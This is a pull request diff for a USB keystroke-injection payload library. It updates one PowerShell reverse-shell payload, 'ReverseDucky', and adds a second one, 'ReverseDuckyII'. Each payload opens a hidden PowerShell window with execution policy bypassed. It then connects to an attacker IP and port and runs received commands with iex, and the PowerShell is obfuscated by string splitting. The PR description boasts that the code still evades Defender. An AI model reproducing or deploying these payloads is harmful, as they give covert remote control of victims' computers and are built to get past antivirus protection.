### PR TITLE
Updated ReverseDucky to v. 1.1

### DIFF
--- a/library/payloads/remote_access/ReverseDucky.txt
+++ b/library/payloads/remote_access/ReverseDucky.txt
@@ -1,12 +1,11 @@
-#      ReverseDucky
-#      Version 1.0
-#      Author: 0iphor13
-#
-#      A Reverse shell executed in the background with powershell
-#      LINE 23 - Fill the IP blocks (*FIRST BLOCK* etc) - 192 | 168 | 178 | 33
-#      LINE 25 - Change *PORT* to Port number
-#      DON'T FORGET TO START LISTENER
+REM       ReverseDucky
+REM       Version 1.1
+REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM       Author: 0iphor13
 
+REM       Reverse shell executed in the background
+REM       Fill in Attacker IP & Port in line 18
+REM       DON'T FORGET TO START LISTENER
 
 DELAY 1500
 GUI r
@@ -16,28 +15,14 @@ DELAY 250
 ENTER
 
 DELAY 200
-STRING SeT-ITeM  VARIABLE:Q528Yl  ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT')  )  ;${clie
+STRING $I='0.0.0.0';$P=4444;$0LVhbQ=  [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
 DELAY 200
-STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
+STRING ient('192.168.178.25',4444);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
 DELAY 200
-STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),
+STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
 DELAY 200
-STRING PORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
+STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
 DELAY 200
-STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
-DELAY 200
-STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
-DELAY 200
-STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
-DELAY 200
-STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
-DELAY 200
-STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI  VaRiABLE:Q528YL )."vA
-DELAY 200
-STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
-DELAY 200
-STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
-DELAY 200
-STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
-DELAY 200
+STRING $sbt.Length);$S.Flush()};$C.Close()
+DELAY 100
 ENTER

--- a/library/payloads/remote_access/ReverseDuckyII.txt
+++ b/library/payloads/remote_access/ReverseDuckyII.txt
@@ -1,0 +1,35 @@
+REM       ReverseDucky2
+REM       Version 1.0
+REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM       Author: 0iphor13
+
+REM       Reverse shell executed in the background
+REM       Fill in Attacker-IP and Port in Line 19
+REM       DON'T FORGET TO START LISTENER
+
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient
+DELAY 200
+STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s
+DELAY 200
+STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE
+DELAY 200
+STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou
+DELAY 200
+STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt
+DELAY 200
+STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len
+DELAY 200
+STRING gth);$stream.Flush()};$client.Close()
+DELAY 100
+ENTER
+
+


### PR DESCRIPTION
Updated ReverseDucky to version 1.1 - Shorten the code (Now faster than RDII) & still evade Defender.